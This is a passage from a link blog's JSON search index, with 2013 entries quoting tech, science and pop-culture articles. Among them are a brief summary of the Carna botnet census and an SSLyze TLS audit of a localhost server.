esto”.\u003c/p\u003e","title":"Cómo 4 ecuaciones cambiaron el mundo"},{"content":" An examination of some questionable events and circumstances leading up to the destruction of the Death Star, through the eyes of an amateur investigative journalist within the Star Wars galaxy. The focus is mainly on the connections between the people who created and operated the Death Star and those responsible for destroying it. For those who don’t care for the obvious, this is a satirical spoof of the 9/11 truther video Loose Change.\n» Graham Putnam | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2013/05/01/lukes-change-an-inside-job/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAn examination of some questionable events and circumstances leading\nup to the destruction of the Death Star, through the eyes of an\namateur investigative journalist within the Star Wars galaxy. The\nfocus is mainly on the connections between the people who created and\noperated the Death Star and those responsible for destroying it.\nFor those who don’t care for the obvious, this is a satirical spoof\nof the 9/11 truther video Loose Change.\u003c/p\u003e","title":"Luke’s Change: an Inside Job"},{"content":" HTTP stands for Hypertext Transfer Protocol. It’s a stateless, application-layer protocol for communicating between distributed systems, and is the foundation of the modern web. As a web developer, we all must have a strong understanding of this protocol.\nLet’s review this powerful protocol through the lens of a web developer. We’ll tackle the topic in two parts. In this first entry, we’ll cover the basics and outline the various request and response headers. In the follow-up article, we’ll review specific pieces of HTTP – namely caching, connection handling and authentication.\n» Pavan Podila | tutsplus.com\n","permalink":"http://karpoke.ignaciocano.com/2013/04/30/http-the-protocol-every-web-developer-must-know-part-1/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHTTP stands for Hypertext Transfer Protocol. It’s a stateless,\napplication-layer protocol for communicating between distributed\nsystems, and is the foundation of the modern web. As a web developer,\nwe all must have a strong understanding of this protocol.\u003c/p\u003e\n\u003cp\u003eLet’s review this powerful protocol through the lens of a web\ndeveloper. We’ll tackle the topic in two parts. In this first entry,\nwe’ll cover the basics and outline the various request and response\nheaders. In the follow-up article, we’ll review specific pieces of\nHTTP – namely caching, connection handling and authentication.\u003c/p\u003e","title":"HTTP: The Protocol Every Web Developer Must Know – Part 1"},{"content":" En 1997 esto era lo más avanzado en la industria del entretenimiento móvil. ”Snake” era conocido en entre los jugadores de PC y otras plataformas informáticas pero el Nokia 6110 fue el primer teléfono que lo integró entre sus características.\n[1\n» Angel Jimenez de Luis | gizmodo.com\n","permalink":"http://karpoke.ignaciocano.com/2013/04/29/una-partida-perfecta-de-serpiente/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEn 1997 esto era lo más avanzado en la industria del entretenimiento\nmóvil. ”Snake” era conocido en entre los jugadores de PC y otras\nplataformas informáticas pero el Nokia 6110 fue el primer teléfono que\nlo integró entre sus características.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e[\u003cimg alt=\"Hosted by imgur\" loading=\"lazy\" src=\"http://i.imgur.com/dAtcCfH.gif\"\u003e\u003ca href=\"http://i.imgur.com/dAtcCfH\"\u003e1\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e» Angel Jimenez de Luis | \u003ca href=\"http://es.gizmodo.com/un-partida-perfecta-de-serpiente-472150126\"\u003egizmodo.com\u003c/a\u003e\u003c/p\u003e","title":"Una partida ’perfecta’ de Serpiente"},{"content":" Probablemente es una de las series de televisión que más carcajadas me ha arrancado en los últimos años. Pese a su título (en español, Los informáticos) tiene bastante poco que ver con el humor ”nerd” de The Big Bang Theory, por ejemplo. The IT Crowd, para quien todavía no la haya visto y se la esté perdiendo, es una comedia de malentendidos y enredos, repleta de situaciones surrealistas que llegan a complicarse hasta el delirio incluso en los breves minutos que dura cada episodio.\n» Emilio de Gorgot | jotdown.es\n","permalink":"http://karpoke.ignaciocano.com/2013/04/28/imprescindibles-the-i-t-crowd/","summary":"\u003cblockquote\u003e\n\u003cp\u003eProbablemente es una de las series de televisión que más carcajadas me\nha arrancado en los últimos años. Pese a su título (en español, Los\ninformáticos) tiene bastante poco que ver con el humor ”nerd” de The\nBig Bang Theory, por ejemplo. The IT Crowd, para quien todavía no la\nhaya visto y se la esté perdiendo, es una comedia de malentendidos y\nenredos, repleta de situaciones surrealistas que llegan a complicarse\nhasta el delirio incluso en los breves minutos que dura cada episodio.\u003c/p\u003e","title":"Imprescindibles: The I.T. Crowd"},{"content":" En mi opinión el origen de todos los males que afectan a la profesión del desarrollo de software (no me meto en otras cosas), o mejor dicho del programador (evito eufemismos tipo ”arquitecto”, ”ingeniero software”, ”desarrollador” o similares) es el desprecio a programar, el desprecio de la labor del programador frente a otros tipos de tareas.\n» Jose María Arranz | saveinformaticos.reeelab.com\n","permalink":"http://karpoke.ignaciocano.com/2013/04/27/no-debes-despreciar-aquello-que-mas-necesitas/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEn mi opinión el origen de todos los males que afectan a la profesión\ndel desarrollo de software (no me meto en otras cosas), o mejor dicho\ndel programador (evito eufemismos tipo ”arquitecto”, ”ingeniero\nsoftware”, ”desarrollador” o similares) es el desprecio a programar,\nel desprecio de la labor del programador frente a otros tipos de\ntareas.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Jose María Arranz | \u003ca href=\"http://saveinformaticos.reeelab.com/2013/04/10/no-debes-despreciar-aquello-que-mas-necesitas/\"\u003esaveinformaticos.reeelab.com\u003c/a\u003e\u003c/p\u003e","title":"No debes despreciar aquello que más necesitas"},{"content":"\n» mr. dalliard | mr-dalliard.tumblr.com\n","permalink":"http://karpoke.ignaciocano.com/2013/04/21/time-travel-in-movies/","summary":"\u003cp\u003e\u003cimg alt=\"Time travel in movies\" loading=\"lazy\" src=\"/images/tumblr_mkzuf92pKY1snzjk8o1_500.png\"\u003e\u003c/p\u003e\n\u003cp\u003e» mr. dalliard | \u003ca href=\"http://mr-dalliard.tumblr.com/post/47542367365/time-travel-in-movies\"\u003emr-dalliard.tumblr.com\u003c/a\u003e\u003c/p\u003e","title":"Time travel in movies"},{"content":" La teoría de la ”supervivencia del más apto” de Darwin puede aplicarse tanto a los sistemas biológicos como a los sistemas informáticos, sugiere una investigación del BNL y de la la Stony Brook University de Nueva York. El análisis del genoma de 500 bacterias y de 200.000 paquetes Linux ha revelado que estas dos redes complejas utilizan el mismo mecanismo para expandir sus componentes clave. La razón de esta similitud estaría en que las dos son sistemas de acceso libre, afirman los científicos.\n» laflecha.net\n","permalink":"http://karpoke.ignaciocano.com/2013/04/20/los-codigos-geneticos-e-informaticos-comparten-sorprendentes-similitudes/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa teoría de la ”supervivencia del más apto” de Darwin puede aplicarse\ntanto a los sistemas biológicos como a los sistemas informáticos,\nsugiere una investigación del BNL y de la la Stony Brook University de\nNueva York. El análisis del genoma de 500 bacterias y de 200.000\npaquetes Linux ha revelado que estas dos redes complejas utilizan el\nmismo mecanismo para expandir sus componentes clave. La razón de esta\nsimilitud estaría en que las dos son sistemas de acceso libre, afirman\nlos científicos.\u003c/p\u003e","title":"Los códigos genéticos e informáticos comparten sorprendentes similitudes"},{"content":" La vida es algo de lo que tenemos constancia directa, identificamos si un sistema está vivo o si no lo está. Sin embargo, aún no tenemos una definición totalmente satisfactoria del concepto ’vida’. Bien es cierto que hay una frontera difusa entre lo vivo y lo no vivo, uno siempre puede recurrir a los virus para forzar la conversación, pero a partir de cierto nivel la distinción entre sistemas vivos y sistemas inertes es más que evidente. Y la pregunta es: ¿cómo se originó la vida? ¿qué condiciones dieron lugar a la misma?\n» cuentos-cuanticos.com\n","permalink":"http://karpoke.ignaciocano.com/2013/04/10/senoras-y-senores-con-todos-nosotros-la-vida/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa vida es algo de lo que tenemos constancia directa, identificamos si\nun sistema está vivo o si no lo está. Sin embargo, aún no tenemos una\ndefinición totalmente satisfactoria del concepto ’vida’. Bien es\ncierto que hay una frontera difusa entre lo vivo y lo no vivo, uno\nsiempre puede recurrir a los virus para forzar la conversación, pero a\npartir de cierto nivel la distinción entre sistemas vivos y sistemas\ninertes es más que evidente. Y la pregunta es: ¿cómo se originó la\nvida? ¿qué condiciones dieron lugar a la misma?\u003c/p\u003e","title":"Señoras y señores, con todos nosotros: La Vida"},{"content":" When you buy a Raspberry Pi, the $35 computer doesn’t come with an operating system. Loading your operating system of choice onto an SD card and then booting the Pi turns out to be pretty easy. But where do Pi-compatible operating systems come from?\nWith the Raspberry Pi having just turned one year old, we decided to find out how Raspbian”the officially recommended Pi operating system”came into being. The project required 60-hour work weeks, a home-built cluster of ARM computers, and the rebuilding of 19,000 Linux software packages. And it was all accomplished by two volunteers.\n» Jon Brodkin | arstechnica.com\n","permalink":"http://karpoke.ignaciocano.com/2013/04/06/how-two-volunteers-built-the-raspberry-pis-operating-system/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWhen you buy a Raspberry Pi, the $35 computer doesn’t come with an\noperating system. Loading your operating system of choice onto an SD\ncard and then booting the Pi turns out to be pretty easy. But where do\nPi-compatible operating systems come from?\u003c/p\u003e\n\u003cp\u003eWith the Raspberry Pi having just turned one year old, we decided to\nfind out how Raspbian”the officially recommended Pi operating\nsystem”came into being. The project required 60-hour work weeks, a\nhome-built cluster of ARM computers, and the rebuilding of 19,000\nLinux software packages. And it was all accomplished by two\nvolunteers.\u003c/p\u003e","title":"How two volunteers built the Raspberry Pi’s operating system"},{"content":" Un equipo de investigadores de la Universidad de Stanford ha desarrollado el primer transistor biológico a partir de materiales genéticos: ADN y ARN. Bajo el nombre de ”transcriptor”, los científicos hablan de este transistor biológico como el componente final necesario para la construcción de computadoras biológicas que funcionen dentro de las células vivas.\n» Miguel Jorge | alt1040.com\n","permalink":"http://karpoke.ignaciocano.com/2013/04/05/desarrollan-el-primer-transistor-biologico/","summary":"\u003cblockquote\u003e\n\u003cp\u003eUn equipo de investigadores de la Universidad de Stanford ha\ndesarrollado el primer transistor biológico a partir de materiales\ngenéticos: ADN y ARN. Bajo el nombre de ”transcriptor”, los\ncientíficos hablan de este transistor biológico como el componente\nfinal necesario para la construcción de computadoras biológicas que\nfuncionen dentro de las células vivas.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Miguel Jorge | \u003ca href=\"http://alt1040.com/2013/04/primer-transistor-biologico\"\u003ealt1040.com\u003c/a\u003e\u003c/p\u003e","title":"Desarrollan el primer transistor biológico"},{"content":" Merriam-Webster defines a tenet as ”a principle, belief, or doctrine generally held to be true; especially one held in common by members of an organization, movement, or profession.” As it happens, Linux is claimed by two doctrines that are to some degree at odds: those of free software and open source. This contention began when Eric S. Raymond published ”Goodbye, ’free software’; hello, ’open source’”, on February 8, 1998\n» Doc Searls | linuxjournal.com\n","permalink":"http://karpoke.ignaciocano.com/2013/04/04/free-and-open-and-their-opposites/","summary":"\u003cblockquote\u003e\n\u003cp\u003eMerriam-Webster defines a tenet as ”a principle, belief, or doctrine\ngenerally held to be true; especially one held in common by members of\nan organization, movement, or profession.” As it happens, Linux is\nclaimed by two doctrines that are to some degree at odds: those of\nfree software and open source. This contention began when Eric S.\nRaymond published ”Goodbye, ’free software’; hello, ’open source’”, on\nFebruary 8, 1998\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Doc Searls | \u003ca href=\"http://www.linuxjournal.com/content/free-and-openmdashand-their-opposites\"\u003elinuxjournal.com\u003c/a\u003e\u003c/p\u003e","title":"Free and Open”and Their Opposites"},{"content":" Yes, it’s that white (or green) on black screen, where mysterious text flows and strange commands execute. I know great programmers who never use the CLI; however, I also know basic computer users who do everything in the CLI instead of the graphical user interface (GUI). They have console applications to browse the web and file system, read mail, view images and edit text. They even watch YouTube videos and read PDF files without a GUI!\nIt’s up to each person to find his or her best workflow. Some prefer the GUI, while others enjoy the CLI.\n» Patkos Csaba | net.tutsplus.com\n","permalink":"http://karpoke.ignaciocano.com/2013/04/03/the-command-line-is-your-best-friend/","summary":"\u003cblockquote\u003e\n\u003cp\u003eYes, it’s that white (or green) on black screen, where mysterious text\nflows and strange commands execute. I know great programmers who never\nuse the CLI; however, I also know basic computer users who do\neverything in the CLI instead of the graphical user interface (GUI).\nThey have console applications to browse the web and file system, read\nmail, view images and edit text. They even watch YouTube videos and\nread PDF files without a GUI!\u003c/p\u003e","title":"The Command Line is Your Best Friend"},{"content":" ¿Y si nos juntáramos un grupo de expertos que trabajan en grandes sitios para crear una guía para el rendimiento front-end definitiva?\nY no sólo una de esas aburridas guías hechas para robots, ¿y si hiciéramos algo divertido? ¿Qué tal reunirse Briza Bueno (Americanas.com), Davidson Fellipe (Globo.com), Giovanni Keppelen (ex-Peixe Urbano), Jaydson Gomes (Terra), Marcel Duran (Twitter), Mike Taylor (Opera), Renato Mangini (Google) y Sérgio Lopes (Caelum) para crear la mejor referencia posible?\n¡Eso es exactamente lo que hemos hecho! Y nosotros te guiaremos en esta batalla para crear sitios incluso más rápidos.\n» Zeno Rocha | browserdiet.com\n","permalink":"http://karpoke.ignaciocano.com/2013/04/02/como-perder-peso-en-el-navegador/","summary":"\u003cblockquote\u003e\n\u003cp\u003e¿Y si nos juntáramos un grupo de expertos que trabajan en grandes\nsitios para crear una guía para el rendimiento front-end definitiva?\u003c/p\u003e\n\u003cp\u003eY no sólo una de esas aburridas guías hechas para robots, ¿y si\nhiciéramos algo divertido? ¿Qué tal reunirse Briza Bueno\n(Americanas.com), Davidson Fellipe (Globo.com), Giovanni Keppelen\n(ex-Peixe Urbano), Jaydson Gomes (Terra), Marcel Duran (Twitter), Mike\nTaylor (Opera), Renato Mangini (Google) y Sérgio Lopes (Caelum) para\ncrear la mejor referencia posible?\u003c/p\u003e","title":"Cómo perder peso (en el navegador)"},{"content":" While playing around with the Nmap Scripting Engine (NSE) we discovered an amazing number of open embedded devices on the Internet. Many of them are based on Linux and allow login to standard BusyBox with empty or default credentials. We used these devices to build a distributed port scanner to scan all IPv4 addresses. These scans include service probes for the most common ports, ICMP ping, reverse DNS and SYN scans. We analyzed some of the data to get an estimation of the IP address usage.\n» Carna Botnet | internetcensus2012.bitbucket.org\n","permalink":"http://karpoke.ignaciocano.com/2013/04/01/internet-census-2012-port-scanning-0-using-insecure-embedded-devices/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWhile playing around with the Nmap Scripting Engine (NSE) we\ndiscovered an amazing number of open embedded devices on the Internet.\nMany of them are based on Linux and allow login to standard BusyBox\nwith empty or default credentials. We used these devices to build a\ndistributed port scanner to scan all IPv4 addresses. These scans\ninclude service probes for the most common ports, ICMP ping, reverse\nDNS and SYN scans. We analyzed some of the data to get an estimation\nof the IP address usage.\u003c/p\u003e","title":"Internet Census 2012: Port scanning /0 using insecure embedded devices"},{"content":" On the surface, a microprocessor’s registers seem like simple storage, but not in the 8085 microprocessor. Reverse-engineering the 8085 reveals many interesting tricks that make the registers fast and compact. The picture below shows that the registers and associated control circuitry occupy a large fraction of the chip, so efficiency is important. Each bit is implemented with a surprisingly compact circuit. The instruction set is designed to make register accesses efficient. An indirection trick allows quick register exchanges. Many register operations use the unexpected but efficient data path of going through the ALU.\n» Ken Shirriff | righto.com\n","permalink":"http://karpoke.ignaciocano.com/2013/03/31/the-8085s-register-file-reverse-engineered/","summary":"\u003cblockquote\u003e\n\u003cp\u003eOn the surface, a microprocessor’s registers seem like simple storage,\nbut not in the 8085 microprocessor. Reverse-engineering the 8085\nreveals many interesting tricks that make the registers fast and\ncompact. The picture below shows that the registers and associated\ncontrol circuitry occupy a large fraction of the chip, so efficiency\nis important. Each bit is implemented with a surprisingly compact\ncircuit. The instruction set is designed to make register accesses\nefficient. An indirection trick allows quick register exchanges. Many\nregister operations use the unexpected but efficient data path of\ngoing through the ALU.\u003c/p\u003e","title":"The 8085’s register file reverse engineered"},{"content":" Cuando se habla del nacimiento de los primeros computadores, normalmente, se suelen asociar a hombres que trabajaban en el equipo de descifradores de códigos Bletchley Park durante la Segunda Guerra Mundial (como Alan Turing), John William Mauchly y John Presper Eckert en el ENIAC o Howard H. Aiken como responsable de la construcción de la Harvard Mark I; sin embargo, en los equipos de trabajo de estos pioneros de la computación se encontraban mujeres que ejercieron de programadoras y diseñadoras de los precursores de los ordenadores y servidores que sustentan nuestro trabajo diario.\n» JJ Velasco | blogthinkbig.com\n","permalink":"http://karpoke.ignaciocano.com/2013/03/31/las-primeras-programadoras/","summary":"\u003cblockquote\u003e\n\u003cp\u003eCuando se habla del nacimiento de los primeros computadores,\nnormalmente, se suelen asociar a hombres que trabajaban en el equipo\nde descifradores de códigos Bletchley Park durante la Segunda Guerra\nMundial (como Alan Turing), John William Mauchly y John Presper Eckert\nen el ENIAC o Howard H. Aiken como responsable de la construcción de\nla Harvard Mark I; sin embargo, en los equipos de trabajo de estos\npioneros de la computación se encontraban mujeres que ejercieron de\nprogramadoras y diseñadoras de los precursores de los ordenadores y\nservidores que sustentan nuestro trabajo diario.\u003c/p\u003e","title":"Las primeras programadoras"},{"content":" Tim Berners-Lee habló hace unos días en las conferencias SXSW acerca del futuro de HTML, el lenguaje que inventó para construir la Web. Entre sus dichos habituales sobre la posición de la Web como la plataforma universal definitiva para acceder al conocimiento, Berners-Lee dijo algo que desató las protestas del mundo libre (tecnológicamente hablando): ”si no ponemos las ayudas necesarias para usar DRM [en la Web], la gente simplemente regresará a usar Flash”.\n» Alan Lazalde | eldiario.es\n","permalink":"http://karpoke.ignaciocano.com/2013/03/30/drm-en-html-la-guerra-por-poseer-la-web/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTim Berners-Lee habló hace unos días en las conferencias SXSW acerca\ndel futuro de HTML, el lenguaje que inventó para construir la Web.\nEntre sus dichos habituales sobre la posición de la Web como la\nplataforma universal definitiva para acceder al conocimiento,\nBerners-Lee dijo algo que desató las protestas del mundo libre\n(tecnológicamente hablando): ”si no ponemos las ayudas necesarias para\nusar DRM [en la Web], la gente simplemente regresará a usar Flash”.\u003c/p\u003e","title":"DRM en HTML: la guerra por poseer la Web"},{"content":"SSLyze es una herramienta para analizar la configuración SSL de un servidor, diseñada para ser rápida y exhaustiva.\nUn ejemplo de uso:\n$ python sslyze --regular localhost:443 REGISTERING AVAILABLE PLUGINS ----------------------------- PluginCertInfo PluginSessionRenegotiation PluginCompression PluginSessionResumption PluginOpenSSLCipherSuites CHECKING HOST(S) AVAILABILITY ----------------------------- localhost:443 =\u0026gt; 127.0.0.1:443 SCAN RESULTS FOR LOCALHOST:443 - 127.0.0.1:443 ----------------------------------------------------------------- * Compression : Compression Support: Disabled * Session Renegotiation : Client-initiated Renegotiations: Rejected Secure Renegotiation: Supported * Certificate : Validation w/ Mozilla\u0026#39;s CA Store: Certificate is NOT Trusted: self signed certificate in certificate chain Hostname Validation: OK - Common Name Matches SHA1 Fingerprint: 12C4EC1C16807D8654269FBE5E0A8DBFBF1244CC Common Name: localhost Issuer: /C=ES/ST=IB/O=Localhost CA/CN=localhost/emailAddress=postmaster@localhost Serial Number: F525610B96987DAE Not Before: Mar 20 10:31:07 2013 GMT Not After: Mar 20 10:31:07 2014 GMT Signature Algorithm: sha1WithRSAEncryption Key Size: 2048 Unhandled exception when processing --sslv2: utils.ctSSL.errors.ctSSLFeatureNotAvailable - SSLv2 disabled. * Session Resumption : With Session IDs: Supported (5 successful, 0 failed, 0 errors, 5 total attempts). With TLS Session Tickets: Supported * TLSV1_1 Cipher Suites : Rejected Cipher Suite(s): Hidden Preferred Cipher Suite: RC4-SHA 128 bits HTTP 302 Found - / Accepted Cipher Suite(s): CAMELLIA256-SHA 256 bits HTTP 302 Found - / AES256-SHA 256 bits HTTP 302 Found - / DES-CBC3-SHA 168 bits HTTP 302 Found - / RC4-SHA 128 bits HTTP 302 Found - / CAMELLIA128-SHA 128 bits HTTP 302 Found - / AES128-SHA 128 bits HTTP 302 Found - / Undefined - An unexpected error happened: None * TLSV1_2 Cipher Suites : Rejected Cipher Suite(s): Hidden Preferred Cipher Suite: AES128-GCM-SHA256 128 bits HTTP 302 Found - / Accepted Cipher Suite(s): CAMELLIA256-SHA 256 bits HTTP 302 Found - / AES256-SHA256 256 bits HTTP 302 Found - / AES256-SHA 256 bits HTTP 302 Found - / AES256-GCM-SHA384 256 bits HTTP 302 Found - / DES-CBC3-SHA 168 bits HTTP 302 Found - / RC4-SHA 128 bits HTTP 302 Found - / CAMELLIA128-SHA 128 bits HTTP 302 Found - / AES128-SHA256 128 bits HTTP 302 Found - / AES128-SHA 128 bits HTTP 302 Found - / AES128-GCM-SHA256 128 bits HTTP 302 Found - / Undefined - An unexpected error happened: None * SSLV3 Cipher Suites : Rejected Cipher Suite(s): Hidden Preferred Cipher Suite: RC4-SHA 128 bits HTTP 302 Found - / Accepted Cipher Suite(s): CAMELLIA256-SHA 256 bits HTTP 302 Found - / AES256-SHA 256 bits HTTP 302 Found - / DES-CBC3-SHA 168 bits HTTP 302 Found - / RC4-SHA 128 bits HTTP 302 Found - / CAMELLIA128-SHA 128 bits HTTP 302 Found - / AES128-SHA 128 bits HTTP 302 Found - / Undefined - An unexpected error happened: None * TLSV1 Cipher Suites : Rejected Cipher Suite(s): Hidden Preferred Cipher Suite: RC4-SHA 128 bits HTTP 302 Found - / Accepted Cipher Suite(s): CAMELLIA256-SHA 256 bits HTTP 302 Found - / AES256-SHA 256 bits HTTP 302 Found - / DES-CBC3-SHA 168 bits HTTP 302 Found - / RC4-SHA 128 bits HTTP 302 Found - / CAMELLIA128-SHA 128 bits HTTP 302 Found - / AES128-SHA 128 bits HTTP 302 Found - / Undefined - An unexpected error happened: None SCAN COMPLETED IN 16.95 S ------------------------- ","permalink":"http://karpoke.ignaciocano.com/2013/03/29/sslyze/","summary":"\u003cp\u003e\u003ca href=\"https://github.com/iSECPartners/sslyze\"\u003eSSLyze\u003c/a\u003e es una herramienta para analizar la configuración SSL de un\nservidor, diseñada para ser rápida y exhaustiva.\u003c/p\u003e\n\u003cp\u003eUn ejemplo de uso:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ python sslyze --regular localhost:443\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e REGISTERING AVAILABLE PLUGINS\n -----------------------------\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e  PluginCertInfo\n  PluginSessionRenegotiation\n  PluginCompression\n  PluginSessionResumption\n  PluginOpenSSLCipherSuites\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e CHECKING HOST(S) AVAILABILITY\n -----------------------------\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e   localhost:443        =\u0026gt; 127.0.0.1:443\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e SCAN RESULTS FOR LOCALHOST:443 - 127.0.0.1:443\n -----------------------------------------------------------------\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e  * Compression :\n        Compression Support:      Disabled\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e  * Session Renegotiation :\n      Client-initiated Renegotiations:    Rejected\n      Secure Renegotiation:               Supported\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e  * Certificate :\n      Validation w/ Mozilla\u0026#39;s CA Store:  Certificate is NOT Trusted: self signed certificate in certificate chain\n      Hostname Validation:               OK - Common Name Matches\n      SHA1 Fingerprint:                  12C4EC1C16807D8654269FBE5E0A8DBFBF1244CC\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Common Name:                       localhost\n      Issuer:                            /C=ES/ST=IB/O=Localhost CA/CN=localhost/emailAddress=postmaster@localhost\n      Serial Number:                     F525610B96987DAE\n      Not Before:                        Mar 20 10:31:07 2013 GMT\n      Not After:                         Mar 20 10:31:07 2014 GMT\n      Signature Algorithm:               sha1WithRSAEncryption\n      Key Size:                          2048\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eUnhandled exception when processing --sslv2:\nutils.ctSSL.errors.ctSSLFeatureNotAvailable - SSLv2 disabled.\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e  * Session Resumption :\n      With Session IDs:           Supported (5 successful, 0 failed, 0 errors, 5 total attempts).\n      With TLS Session Tickets:   Supported\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e  * TLSV1_1 Cipher Suites :\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Rejected Cipher Suite(s): Hidden\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Preferred Cipher Suite:\n        RC4-SHA                  128 bits      HTTP 302 Found - /\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Accepted Cipher Suite(s):\n        CAMELLIA256-SHA          256 bits      HTTP 302 Found - /\n        AES256-SHA               256 bits      HTTP 302 Found - /\n        DES-CBC3-SHA             168 bits      HTTP 302 Found - /\n        RC4-SHA                  128 bits      HTTP 302 Found - /\n        CAMELLIA128-SHA          128 bits      HTTP 302 Found - /\n        AES128-SHA               128 bits      HTTP 302 Found - /\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Undefined - An unexpected error happened: None\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e  * TLSV1_2 Cipher Suites :\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Rejected Cipher Suite(s): Hidden\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Preferred Cipher Suite:\n        AES128-GCM-SHA256        128 bits      HTTP 302 Found - /\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Accepted Cipher Suite(s):\n        CAMELLIA256-SHA          256 bits      HTTP 302 Found - /\n        AES256-SHA256            256 bits      HTTP 302 Found - /\n        AES256-SHA               256 bits      HTTP 302 Found - /\n        AES256-GCM-SHA384        256 bits      HTTP 302 Found - /\n        DES-CBC3-SHA             168 bits      HTTP 302 Found - /\n        RC4-SHA                  128 bits      HTTP 302 Found - /\n        CAMELLIA128-SHA          128 bits      HTTP 302 Found - /\n        AES128-SHA256            128 bits      HTTP 302 Found - /\n        AES128-SHA               128 bits      HTTP 302 Found - /\n        AES128-GCM-SHA256        128 bits      HTTP 302 Found - /\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Undefined - An unexpected error happened: None\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e  * SSLV3 Cipher Suites :\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Rejected Cipher Suite(s): Hidden\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Preferred Cipher Suite:\n        RC4-SHA                  128 bits      HTTP 302 Found - /\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Accepted Cipher Suite(s):\n        CAMELLIA256-SHA          256 bits      HTTP 302 Found - /\n        AES256-SHA               256 bits      HTTP 302 Found - /\n        DES-CBC3-SHA             168 bits      HTTP 302 Found - /\n        RC4-SHA                  128 bits      HTTP 302 Found - /\n        CAMELLIA128-SHA          128 bits      HTTP 302 Found - /\n        AES128-SHA               128 bits      HTTP 302 Found - /\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Undefined - An unexpected error happened: None\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e  * TLSV1 Cipher Suites :\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Rejected Cipher Suite(s): Hidden\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Preferred Cipher Suite:\n        RC4-SHA                  128 bits      HTTP 302 Found - /\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Accepted Cipher Suite(s):\n        CAMELLIA256-SHA          256 bits      HTTP 302 Found - /\n        AES256-SHA               256 bits      HTTP 302 Found - /\n        DES-CBC3-SHA             168 bits      HTTP 302 Found - /\n        RC4-SHA                  128 bits      HTTP 302 Found - /\n        CAMELLIA128-SHA          128 bits      HTTP 302 Found - /\n        AES128-SHA               128 bits      HTTP 302 Found - /\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e      Undefined - An unexpected error happened: None\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e SCAN COMPLETED IN 16.95 S\n -------------------------\n\u003c/code\u003e\u003c/pre\u003e","title":"SSLyze"},{"content":" Varios medios se han hecho eco del que puede ser, probablemente, el mayor ataque de denegación de servicio (DDOS) registrado en la historia de Internet. Todo parece indicar que tras el ataque está una disputa en torno al SPAM. Una de las víctimas, CloudFlare, sitio especializado en la distribución de contenidos, ha confirmado el hecho.\nEl ataque ha tenido lugar entre el 18 y 19 de este mes, afectando a muchos usuarios de la Red y servicios como Netflix. Para entender hasta qué punto el ataque ha sido importante, pensad que un ataque DDOS normal puede suponer un tráfico de 10 Gbps, y éste ha llegado a picos de 300 Gbps, el más importante que se conoce públicamente.\n» F.Manuel 